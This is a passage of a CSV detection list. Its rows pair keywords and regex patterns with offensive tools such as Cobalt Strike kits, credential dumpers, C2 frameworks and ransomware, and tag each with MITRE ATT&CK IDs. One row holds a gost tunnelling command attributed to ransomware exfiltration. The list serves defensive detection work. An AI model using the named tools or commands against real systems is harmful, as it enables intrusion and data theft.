"*byt3bl33d3r@pm.me*",".{0,1000}byt3bl33d3r\@pm\.me.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*-c /tmp/redsocks.conf*",".{0,1000}\-c\s\/tmp\/redsocks\.conf.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*-c 854A20FB-2D44-457D-992F-EF13785D2B51*",".{0,1000}\-c\s854A20FB\-2D44\-457D\-992F\-EF13785D2B51.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*-c BOF.cpp -o BOF.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*-c BOF.cpp -o BOF.x64.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*-c credentialmanager.c -o credentialmanager.o*",".{0,1000}\-c\scredentialmanager\.c\s\-o\scredentialmanager\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*-c modifiableautorun.c -o modifiableautorun.o*",".{0,1000}\-c\smodifiableautorun\.c\s\-o\smodifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*-c tokenprivileges.c -o tokenprivileges.o*",".{0,1000}\-c\stokenprivileges\.c\s\-o\stokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*-c unquotedsvcpath.c -o unquotedsvcpath.o*",".{0,1000}\-c\sunquotedsvcpath\.c\s\-o\sunquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*C&C => *",".{0,1000}C\&C\s\=\>\s.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*c:/chaos-container:/database/*",".{0,1000}c\:\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*c:/users/public/creds.log*",".{0,1000}c\:\/users\/public\/creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*C:\\temp\\debug.dmp*",".{0,1000}C\:\\\\temp\\\\debug\.dmp.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*C:\\temp\\test.txt*",".{0,1000}C\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*C:\\Users\\L.Ackerman=*",".{0,1000}C\:\\\\Users\\\\L\.Ackerman\=.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*C:\\Users\\Public\\example.txt*",".{0,1000}C\:\\\\Users\\\\Public\\\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*C:\\Users\\Public\\Windows\\Ui\\*",".{0,1000}C\:\\\\Users\\\\Public\\\\Windows\\\\Ui\\\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*c:\123.txt*",".{0,1000}c\:\\123\.txt.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*C:\aab.txt*",".{0,1000}C\:\\aab\.txt.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*c:\agent.exe*",".{0,1000}c\:\\agent\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*C:\ASEC.log*",".{0,1000}C\:\\ASEC\.log.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*C:\dsc_hello.txt*",".{0,1000}C\:\\dsc_hello\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*C:\kernel.dmp*",".{0,1000}C\:\\kernel\.dmp.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*C:\ProgramData\Prefetch\na.exe*",".{0,1000}C\:\\ProgramData\\Prefetch\\na\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*C:\ProgramData\SystemData\microsoft_Windows.dll*",".{0,1000}C\:\\ProgramData\\SystemData\\microsoft_Windows\.dll.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*C:\Temp\*-*.kirbi*",".{0,1000}C\:\\Temp\\.{0,1000}\-.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*C:\Temp\file.exe*",".{0,1000}C\:\\Temp\\file\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*c:\temp\history.csv*",".{0,1000}c\:\\temp\\history\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*c:\temp\history.html*",".{0,1000}c\:\\temp\\history\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*c:\temp\history.txt*",".{0,1000}c\:\\temp\\history\.txt.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*c:\temp\nc.exe*",".{0,1000}c\:\\temp\\nc\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*C:\Temp\poc.txt*",".{0,1000}C\:\\Temp\\poc\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*c:\temp\something.ps1*",".{0,1000}c\:\\temp\\something\.ps1.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*C:\temp\tmp.tmp*",".{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*C:\Uac\results.cab*",".{0,1000}C\:\\Uac\\results\.cab.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*C:\Users\*\AppData\Local\Temp\performance_636_3000_1.dll*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Local\\Temp\\performance_636_3000_1\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*C:\Users\*\AppData\Roaming\Indexing.*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*C:\Users\*\AppData\Roaming\svchost.exe*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\svchost\.exe.{0,1000}","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*C:\Users\cyberstair\*",".{0,1000}C\:\\Users\\cyberstair\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*c:\users\public\*.dll*",".{0,1000}c\:\\users\\public\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","_","dll file in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2","1","0","observed with PortStarter DLL","10","10","N/A","N/A","N/A","N/A" "*C:\Users\Public\*.dmp*",".{0,1000}C\:\\Users\\Public\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c:\users\public\creds.log*",".{0,1000}c\:\\users\\public\\creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*c:\Users\Public\Documents\log.txt*",".{0,1000}c\:\\Users\\Public\\Documents\\log\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*C:\Users\Public\example.txt*",".{0,1000}C\:\\Users\\Public\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*c:\users\public\output.txt*",".{0,1000}c\:\\users\\public\\output\.txt.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*C:\Users\Public\perm.txt*",".{0,1000}C\:\\Users\\Public\\perm\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*C:\Users\Public\test.txt*",".{0,1000}C\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*C:\Windows\DirectX.log*\Windows\Temp\backup.log*",".{0,1000}C\:\\Windows\\DirectX\.log.{0,1000}\\Windows\\Temp\\backup\.log.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*",".{0,1000}C\:\\Windows\\System\.exe.{0,1000}\s\-L\srtcp\:\/\/0\.0\.0\.0\:8087\/127\.0\.0\.1\:4444\s\-F\ssocks5\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}\:443.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*C:\Windows\Temp\move.exe*",".{0,1000}C\:\\Windows\\Temp\\move\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*C:\Windows\Temp\moveme.exe*",".{0,1000}C\:\\Windows\\Temp\\moveme\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*c:\windows\temp\test.tmp farmer*",".{0,1000}c\:\\windows\\temp\\test\.tmp\sfarmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*C??/generator.cpp*",".{0,1000}C\?\?\/generator\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72*",".{0,1000}c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c01fb08dabbd24b151fe5dfbb0742f7a*",".{0,1000}c01fb08dabbd24b151fe5dfbb0742f7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - 